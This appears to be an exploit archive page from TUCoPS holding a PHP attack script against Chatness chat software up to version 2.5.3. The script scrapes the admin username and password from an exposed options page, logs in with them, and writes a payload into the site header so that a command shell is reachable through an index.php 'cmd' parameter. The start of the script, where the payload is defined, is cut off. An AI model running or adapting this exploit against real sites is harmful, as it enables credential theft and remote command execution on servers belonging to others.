TUCoPS :: HP Unsorted C :: tb10380.htm

Chatness <= 2.5.3 - Arbitrary Code Execution
Chatness <= 2.5.3 - Arbitrary Code Execution
Chatness <= 2.5.3 - Arbitrary Code Execution





 \n\tEx: http://www.example.com/chatness/\n"); 

$url = $argv[1];

$ch = curl_init($url . "admin/options.php");
if(!$ch) die("Error Initializing CURL");

echo "[ ] Attempting To Fetch Admin Login...\n";
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$res = curl_exec($ch);
if(!$res) die("Error Connecting To Target");

$httpresult = curl_getinfo($ch,CURLINFO_HTTP_CODE);
if($httpresult!=200) die("Error - URL Appears To Be Incorrect");

//Not good - but it works...sometimes
$junkarray = explode("id=",$res);
$junkarray = explode("\"",$junkarray[14]);
$username = $junkarray[3];

$junkarray = explode("id=",$res);
$junkarray = explode("\"",$junkarray[15]);
$password = $junkarray[3];

echo "[ ] Found Username And Password - ".$username." / ".$password."\n";
echo "[ ] Logging In...\n";

//Login
curl_setopt($ch, CURLOPT_URL,$url . "admin/login.php");
curl_setopt($ch, CURLOPT_COOKIEJAR, "mrcookie.dat");
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"user=".$username."&pass=".$password."&submit=Login");
$res = curl_exec($ch);
if(!res) die("Error Connecting To Target");

$httpresult = curl_getinfo($ch,CURLINFO_HTTP_CODE);
if($httpresult==200) die("Error Invalid Username/Password");

echo "[ ] Login Succeeded..\n";

//Deploy Main Payload
curl_setopt($ch, CURLOPT_URL,$url . "admin/save.php?file=head");
curl_setopt($ch, CURLOPT_COOKIEFILE, "mrcookie.dat");
curl_setopt($ch, CURLOPT_POSTFIELDS,"html=".$payload);
$res = curl_exec($ch);
if(!res) die("Error Connecting To Target");

echo "[ ] Payload Deployed\n";
echo "[ ] Shell Accessible at ".$url."index.php?cmd=";
curl_close($ch);
?>

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH